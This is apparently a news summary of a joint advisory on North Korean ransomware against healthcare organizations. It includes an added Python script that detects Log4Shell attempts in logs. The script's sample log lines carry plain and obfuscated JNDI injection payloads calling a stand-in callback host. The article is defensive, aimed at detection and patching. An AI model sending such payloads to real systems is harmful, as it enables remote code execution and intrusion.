A new joint cybersecurity advisory from CISA, the NSA, the FBI, HHS, the ROK National Intelligence Service, and the ROK Defense Security Agency warns that North Korean state-sponsored actors are conducting ongoing ransomware attacks against healthcare organizations in South Korea and the U.S.
Setting the stage
According to the advisory, the actors start by acquiring infrastructure in ways that conceal their identity: they create fake personas and accounts, and they pay for domains and hosting with cryptocurrency obtained through illicit means.
They then route their operations through VPN services, virtual private servers (VPS), or third-country IP addresses so that the traffic does not appear to originate from North Korea.
For initial access, the actors exploit known vulnerabilities in internet-facing systems, including Log4Shell (CVE-2021-44228), a remote code execution flaw in SonicWall SMA 100 series appliances (CVE-2021-20038), and an admin password disclosure flaw in TerraMaster NAS products (CVE-2022-24990). These give them a foothold on the network, from which they escalate privileges and move laterally.
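Since Log4Shell is the first initial-access vector the advisory names, the following is an added example (not from the advisory or this article) of how a defender can sweep web or application logs for CVE-2021-44228 exploitation attempts. The sample log lines are constructed for the example. Real attempts are frequently obfuscated with nested Log4j lookups (`${lower:j}`, `${::-j}`, `${env:X:-j}`), so a plain search for `${jndi:` misses them; the code resolves those common lookup forms the way Log4j's string substitution would before matching. It is an assumption of the example that only these three obfuscation forms need handling; it does not cover every lookup Log4j supports.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines for this example (not from the advisory).
# Line 0 is benign, lines 1-4 are plain and obfuscated JNDI injection attempts,
# line 5 is a benign string that merely looks like a lookup.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.7/x}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/y}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:dns://198.51.100.7/z}"',
    '10.0.0.3 - - "GET /price HTTP/1.1" 200 "price=${total}"',
]

# An innermost lookup: ${...} with no nested ${ } inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we are ultimately looking for once obfuscation has been peeled away.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(content: str) -> Optional[str]:
    """Return the literal a Log4j lookup would evaluate to, or None if unknown.

    Handles the three forms attackers commonly use to hide the string 'jndi':
      ${lower:J} / ${upper:j}  -> case-converted literal
      ${::-j} / ${env:X:-j}    -> the default value after ':-' (assumed: the
                                  key does not resolve, so the default is used)
    """
    low = content.lower()
    if low.startswith("lower:"):
        return content[6:].lower()
    if low.startswith("upper:"):
        return content[6:].upper()
    if ":-" in content:
        return content.split(":-", 1)[1]
    return None  # unknown lookup (e.g. the jndi one itself): leave in place


def normalize(s: str, max_rounds: int = 20) -> str:
    """Repeatedly substitute innermost resolvable lookups, innermost first,
    mimicking Log4j's nested evaluation, until nothing more changes."""
    for _ in range(max_rounds):
        changed = False

        def sub(m: "re.Match[str]") -> str:
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        s = INNER_LOOKUP.sub(sub, s)
        if not changed:
            break
    return s


def is_log4shell_attempt(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return the index and de-obfuscated payload of every suspicious line."""
    hits: List[Dict[str, object]] = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        m = JNDI_LOOKUP.search(norm)
        if m:
            end = norm.find("}", m.start())
            payload = norm[m.start(): end + 1] if end != -1 else norm[m.start():]
            hits.append({"line": i, "payload": payload})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"line {hit['line']}: {hit['payload']}")
```

The de-obfuscated payload is what you want to pivot on: the host and scheme (ldap, rmi, dns) in it are the attacker's callback server, and an outbound connection from the application host to that address on the LDAP/RMI port is the confirmation that the lookup actually fired. Log scanning alone shows attempts, not success; patching the Log4j instance is the fix the advisory actually calls for.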
The actors have also distributed ransomware through trojanized files for 'X-Popup', an open-source messenger commonly used by employees of small and medium-sized hospitals in South Korea.
Ransomware used in attacks
While the North Korean hackers have been linked to Maui and H0lyGh0st ransomware strains, the advisory notes that they have also been observed using publicly available ransomware tools for encryption.
These include BitLocker (a legitimate Windows encryption feature abused for extortion), Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom.
In the final stage of the attack, the actors demand ransom payments in Bitcoin and communicate with victims through Proton Mail accounts.
Conclusion
CISA notes that the revenue from these ransomware operations funds further North Korean cyber operations, including espionage against the U.S. and South Korean governments. Defenders can use the indicators of compromise (IOCs) published with the advisory to detect and block known infrastructure, and the advisory's mitigation list to reduce exposure: enforcing MFA on accounts, especially for remote access; monitoring network traffic for anomalous connections; and promptly applying available security updates, starting with the internet-facing products named above.